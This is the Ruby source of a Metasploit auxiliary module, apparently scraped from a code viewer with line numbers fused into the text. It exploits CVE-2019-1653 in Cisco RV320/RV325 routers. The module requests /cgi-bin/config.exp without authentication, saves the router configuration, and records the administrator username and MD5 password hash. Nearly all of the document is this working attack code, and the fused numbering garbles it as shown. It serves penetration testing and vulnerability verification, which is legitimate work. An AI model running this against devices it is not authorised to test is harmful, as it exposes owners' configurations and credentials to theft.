Path: blob/master/modules/auxiliary/gather/cisco_rv320_config.rb
19500 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Cisco RV320/RV326 Configuration Disclosure',13'Description' => %q{14A vulnerability in the web-based management interface of Cisco Small Business15RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,16remote attacker to retrieve sensitive information. The vulnerability is due17to improper access controls for URLs. An attacker could exploit this18vulnerability by connecting to an affected device via HTTP or HTTPS and19requesting specific URLs. A successful exploit could allow the attacker to20download the router configuration or detailed diagnostic information. Cisco21has released firmware updates that address this vulnerability.22},23'Author' => [24'RedTeam Pentesting GmbH <[email protected]>',25'Aaron Soto <[email protected]>'26],27'License' => MSF_LICENSE,28'References' => [29['EDB', '46262'],30['BID', '106732'],31['CVE', '2019-1653'],32['URL', 'https://seclists.org/fulldisclosure/2019/Jan/52'],33['URL', 'https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801'],34['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20110330-acs.html']35],36'DisclosureDate' => '2019-01-24',37'DefaultOptions' => {38'SSL' => true39},40'Notes' => {41'Reliability' => UNKNOWN_RELIABILITY,42'Stability' => UNKNOWN_STABILITY,43'SideEffects' => UNKNOWN_SIDE_EFFECTS44}45)46)4748register_options(49[50Opt::RPORT(443),51OptString.new('TARGETURI', [true, 'Path to the device configuration file', '/cgi-bin/config.exp']),52]53)54end5556def report_cred(user, hash)57service_data = {58address: rhost,59port: rport,60service_name: ssl ? 'https' : 'http',61protocol: 'tcp',62workspace_id: myworkspace_id63}6465credential_data = {66module_fullname: self.fullname,67origin_type: :service,68private_data: hash,69private_type: :nonreplayable_hash,70jtr_format: 'md5',71username: user,72}.merge(service_data)7374login_data = {75core: create_credential(credential_data),76status: Metasploit::Model::Login::Status::UNTRIED77}.merge(service_data)7879create_credential_login(login_data)80end8182def parse_config(config)83# Report loot to database (and store on filesystem)84stored_path = store_loot('cisco.rv.config', 'text/plain', rhost, config)85print_good("Stored configuration (#{config.length} bytes) to #{stored_path}")8687# Report host information to database88hostname = config.match(/^HOSTNAME=(.*)/)[1]89model = config.match(/^MODEL=(.*)/)[1]90mac = config.match(/^LANMAC=(.*)/)[1]91mac = mac.scan(/\w{2}/).join(':')92report_host(host: rhost,93mac: mac,94name: hostname,95os_name: 'Cisco',96os_flavor: model)9798# Report password hashes to database99user = config.match(/^user (.*)/)[1]100hash = config.match(/^password (.*)/)[1]101report_cred(user, hash)102end103104def run105begin106uri = normalize_uri(target_uri.path)107res = send_request_cgi({108'uri' => uri,109'method' => 'GET',110}, 60)111rescue OpenSSL::SSL::SSLError112fail_with(Failure::UnexpectedReply, 'SSL handshake failed. Consider setting SSL to false and trying again.')113end114115if res.nil?116fail_with(Failure::UnexpectedReply, 'Empty response. Please validate the RHOST and TARGETURI options and try again.')117elsif res.code != 200118fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} response. Please validate the RHOST and TARGETURI options and try again.")119end120121body = res.body122if body.match(/####sysconfig####/)123parse_config(body)124else body.include? "meta http-equiv=refresh content='0; url=/default.htm'"125fail_with(Failure::NotVulnerable, 'Response suggests device is patched')126end127end128end129130131